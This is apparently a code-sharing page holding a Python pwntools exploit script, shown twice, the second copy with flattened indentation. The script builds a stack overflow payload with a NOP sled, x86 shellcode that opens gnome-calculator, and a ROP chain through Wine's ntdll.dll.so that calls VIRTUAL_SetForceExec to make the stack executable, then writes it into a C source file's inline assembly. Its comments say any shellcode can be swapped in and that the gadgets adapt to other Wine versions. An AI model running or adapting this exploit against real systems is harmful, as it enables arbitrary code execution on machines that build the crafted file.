nathanfarlow/zds_exploit.py

## zds_exploit.py
from pwn import *

# Any linux/windows x86 shellcode will work great as long as there is no \x00 or \x0a.
# This shellcode opens gnome-calculator.
shellcode = b'\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x61\x74\x6f\x72\x68\x6c\x63\x75\x6c\x68\x65\x2d\x63\x61\x68\x67\x6e\x6f\x6d\x68\x3d\x3a\x30\x20\x68\x50\x4c\x41\x59\x66\x68\x49\x53\x83\xec\x01\xc6\x04\x24\x44\x89\xe6\x83\xec\x01\x88\x04\x24\x66\x68\x2d\x63\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x75\x73\x72\x2f\x83\xec\x01\xc6\x04\x24\x2f\x50\x56\x83\xee\x03\x56\x83\xee\x0e\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80'

def gen_payload():

    payload_len = 2052

    p = b'\x90' * (1024 - len(shellcode))
    p += shellcode                  # Somewhere after 0x6df738 on stack

    # We have to give an overwritten local variable some writeable memory so we don't
    # crash before ret. Thankfully ntdll.dll.so is loaded in at a constant address

    p += p32(0x7be94004)            # ntdll.dll.so .data + 4

    p += b'B' * 434
    p += b'C' * 32

    # Rop first to disable DEP, then jump to shellcode on stack. All gadgets are in
    # ntdll.dll.so which makes it easy to adapt the exploit to other wine versions due to
    # lack of aslr. ROP is necessary to encode the stack address that contains \x00

    p += p32(0x7bcce33e)            # call VIRTUAL_SetForceExec to make the stack executable
    p += p32(0x7bcbb001)            # pop edi; pop ebp; ret
    p += p32(0x1259a140)
    p += p32(0x12345678)
    p += p32(0x7bc88bc5)            # xchg eax, edi; ret
    p += p32(0x7bc57c92)            # xor ebp, eax ; ret
    p += p32(0x7bc55b8a)            # xchg eax, ebp; ret
    p += p32(0x7bc4a781)            # push eax ; ret

    p += b'A' * (4 * (payload_len - len(p)))

    return p


payload = b'int main() {\nasm("'

payload += gen_payload()

payload += b'");\n'
payload += b'return 0;\n}'

with open('src/main.c', 'wb') as f:
    f.write(payload)
	from pwn import *

	# Any linux/windows x86 shellcode will work great as long as there is no \x00 or \x0a.
	# This shellcode opens gnome-calculator.
	shellcode = b'\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x61\x74\x6f\x72\x68\x6c\x63\x75\x6c\x68\x65\x2d\x63\x61\x68\x67\x6e\x6f\x6d\x68\x3d\x3a\x30\x20\x68\x50\x4c\x41\x59\x66\x68\x49\x53\x83\xec\x01\xc6\x04\x24\x44\x89\xe6\x83\xec\x01\x88\x04\x24\x66\x68\x2d\x63\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x75\x73\x72\x2f\x83\xec\x01\xc6\x04\x24\x2f\x50\x56\x83\xee\x03\x56\x83\xee\x0e\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80'

	def gen_payload():

	payload_len = 2052

	p = b'\x90' * (1024 - len(shellcode))
	p += shellcode # Somewhere after 0x6df738 on stack

	# We have to give an overwritten local variable some writeable memory so we don't
	# crash before ret. Thankfully ntdll.dll.so is loaded in at a constant address

	p += p32(0x7be94004) # ntdll.dll.so .data + 4

	p += b'B' * 434
	p += b'C' * 32

	# Rop first to disable DEP, then jump to shellcode on stack. All gadgets are in
	# ntdll.dll.so which makes it easy to adapt the exploit to other wine versions due to
	# lack of aslr. ROP is necessary to encode the stack address that contains \x00

	p += p32(0x7bcce33e) # call VIRTUAL_SetForceExec to make the stack executable
	p += p32(0x7bcbb001) # pop edi; pop ebp; ret
	p += p32(0x1259a140)
	p += p32(0x12345678)
	p += p32(0x7bc88bc5) # xchg eax, edi; ret
	p += p32(0x7bc57c92) # xor ebp, eax ; ret
	p += p32(0x7bc55b8a) # xchg eax, ebp; ret
	p += p32(0x7bc4a781) # push eax ; ret

	p += b'A' * (4 * (payload_len - len(p)))

	return p


	payload = b'int main() {\nasm("'

	payload += gen_payload()

	payload += b'");\n'
	payload += b'return 0;\n}'

	with open('src/main.c', 'wb') as f:
	f.write(payload)
No results found